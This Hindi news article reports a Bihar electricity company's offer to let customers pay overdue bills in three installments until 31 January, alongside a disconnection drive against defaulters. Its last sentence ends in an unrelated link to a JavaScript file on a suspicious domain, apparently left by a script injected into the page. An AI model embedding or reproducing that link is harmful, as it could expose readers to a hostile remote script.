बिहार,( कुलसूम फात्मा ) बिजली उपभोक्ताओं के लिए आवश्यक सूचना जिन उपभोक्ताओं के बिजली के बिल बकाया है वह अब परेशान ना हो क्योंकि बिजली कंपनी ने बिजली उपभोक्ताओं के बिल का भुगतान करने की सुविधा उपलब्ध कराई है।

ये प्रथम किस्त बिल की राशि तकरीबन 35% तथा जो बकाया राशि है वह 65% राशि दूसरे तथा तीसरी किस्त में उपभोक्ता जमा कर सकेंगे। और इस सुविधा का फायदा उपभोक्ता केवल जनवरी की 31 तारीख तक ही उठा सकेंगे। इसके पश्चात यह सुविधा समाप्त हो जाएगी।

 

 

बिजली कंपनी द्बारा यह नियम जारी किया जा चुका है। और वह उपभोक्ता जो समय के अंतर्गत किस्तों में अपना बिल जमा नहीं करेंगे उनका कनेक्शन तुंरत काट दिया जाएगा। कनेक्शन काटने के पश्चात यदि कंज्यूमर्स किस्त की सुविधा लेना चाहेंगे हैं तो प्रथम किस्त 50% देनी होगी
कंज्यूमर्स को यह किस्त का फायदा तकरीबन एक लाख तक विद्युत कार्यपालक इंजीनियर तथा 1 से 5 लाख तक विद्युत अधीक्षण इंजीनियर तथा पांच लाख से ऊपर का बकाया यदि हुआ तो जीएम लेवल से किया जाएगा।

 

इसके साथ उपभोक्ता जिनका 2 महीने का बिजली का बिल बाकी है। उनका भी कनेक्शन काट दिया जाएगा। बकायेदारों को अगर इससे बचना है तो वह जनवरी की 31 तारीख तक के अपना बिल को आदा कर दें। क्योंकि पेसू फरवरी से 2 महीने वाले बकायेदारों के विरुद्ध डिस्कनेक्शन अभियान प्रारंभ करने जा रहा है और इसमें तकरीबन एक लाख तथा 2 महीने वाले बकायादार हैं बता दें की महामारी के मध्य बिजली कंपनी को बिजली उपभोक्ता में राजस्व नहीं आ सका। इसके लिए उपभोक्ताओं को सुविधा तो दी ही जायेगी साथ ही लाइन काटो अभियान भी प्रारंभ किया जा रहा है।

 

 

आपको बता दें की पेसू के सभी डिवीजन में हर एक दिन 50 से 100 बिजली का बिल अदा न करने वालों की संख्या जो है उनकी बिजली काट दी जा रही है। बिजली बकायेदारों के विरुद्ध डिस्कनेक्शन का अभियान चलाया जा रहा है। उपभोक्ता कीे सुविधा के लिए रविवार से बिजली का बिल जमा काउंटर खोले जा रहे हैं जिससे की छुट्टी के छुट्टी के दिन सभी लोग बिजली का बिल जमा कर सकें। बता दें की पाटलीपुत्रा विद्युत आपूर्ति डिवीजन के विद्युत कार्यपालक जिनका नाम अभियंता मनीष कांत है। उन्होंने बताया की रविवार से 47 डिस्कनेक्शन किए जा चुके हैं और 1700000 रुपए का राजस्व भी वसूला गया है। 51000 कंज्यूमर्स में अभी कुछ ही 1 साल के बकायेदार बचे रैह गये हैं।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.